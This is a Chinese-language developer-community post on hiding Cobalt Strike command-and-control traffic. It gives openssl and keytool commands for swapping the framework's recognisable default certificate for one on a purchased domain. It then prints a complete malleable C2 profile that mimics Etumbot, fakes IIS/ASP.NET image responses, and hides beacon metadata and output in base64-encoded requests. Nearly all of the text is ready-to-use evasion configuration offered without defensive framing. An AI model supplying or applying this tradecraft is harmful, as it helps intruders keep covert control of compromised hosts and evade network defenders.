CobaltStrike 流量隐藏-阿里云开发者社区

CobaltStrike 流量隐藏

2023-11-21 62

版权

本文内容由阿里云实名注册用户自发贡献，版权归原作者所有，阿里云开发者社区不拥有其著作权，亦不承担相应法律责任。具体规则请查看《阿里云开发者社区用户服务协议》和《阿里云开发者社区知识产权保护指引》。如果您发现本社区中有涉嫌抄袭的内容，填写侵权投诉表单进行举报，一经查实，本社区将立刻删除涉嫌侵权内容。

简介： CobaltStrike 流量隐藏

0x1 https流量隐藏

前言：经过https加密后的流量虽然不是明文，但是cobaltstrike的默认证书有很多敏感文字，

非常容易被识别。除此之外，使用默认的证书，流量也很容易被解密；

解决：生成个人域名的证书；步骤如下：

1. 去申请一个个人域名，推荐 https://www.namecheap.com/；

2.去给域名申请一个证书，下载证书压缩包；推荐

3.上传证书压缩包到 cobaltstrike 目录，并解压；

4.将证书转成 cobaltstrike.store 格式；

## 将公钥、私钥等转换格式
openssl pkcs12 -export -in {公钥文件} -inkey {私钥文件} -out {输出文件的命名} -name {证书对应的域名} -passout pass:{设置证书密码，需要记住}
openssl pkcs12 -export -in full_chain.pem -inkey private.key -out cdn.cseroadweb.xyz.p12 -name cdn.cseroadweb.xyz -passout pass:ccc123456
## 使用keytool生成 store 证书
keytool -importkeystore -deststorepass {上一步设置的密码} -destkeypass {上一步设置的密码} -destkeystore {输出文件的命名} -srckeystore {上一步输出的文件的路径} -srcstoretype PKCS12 -srcstorepass {上一步设置的密码} -alias {证书对应的域名}
keytool -importkeystore -deststorepass ccc123456 -destkeypass ccc123456 -destkeystore new.store -srckeystore cdn.cseroadweb.xyz.p12 -srcstoretype PKCS12 -srcstorepass ccc123456 -alias cdn.cseroadweb.xyz
## 生成store证书后，有1个warning，最好再对证书进行一个格式转换；new-2.store 是刚刚生成的store证书；
keytool -importkeystore -srckeystore new-2.store -destkeystore new-2.store -deststoretype pkcs12

5.替换服务端与客户端通话的证书；

修改teamserver，将 cobaltstrike.store 替换成我们生成的store证书；

6.替换 web https 默认证书；

6.1创建 profile文件，写下如下内容；

set sample_name "Etumbot";
set useragent "Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/5.0)";
http-get {
    set uri "/image/";
    client {
        header "Accept" "text/html,application/xhtml+xml,application/xml;q=0.9,*/*l;q=0.8";
        header "Referer" "http://www.google.com";
        header "Pragma" "no-cache";
        header "Cache-Control" "no-cache";
        metadata {
            netbios;
            append "-.jpg";
            uri-append;
        }
    }
    server {
        header "Content-Type" "img/jpg";
        header "Server" "Microsoft-IIS/6.0";
        header "X-Powered-By" "ASP.NET";
        output {
            base64;
            print;
        }
    }
}
http-post {
    set uri "/history/";
    client {
        header "Content-Type" "application/octet-stream";
        header "Referer" "http://www.google.com";
        header "Pragma" "no-cache";
        header "Cache-Control" "no-cache";
        id {
            netbiosu;
            append ".asp";
            uri-append;
        }
        output {
            base64;
            print;
        }
    }
    server {
        header "Content-Type" "img/jpg";
        header "Server" "Microsoft-IIS/6.0";
        header "X-Powered-By" "ASP.NET";
        output {
            base64;
            print;
        }
    }
}
https-certificate {
    set keystore "new.store";
    set password "Testaaa@1234";
}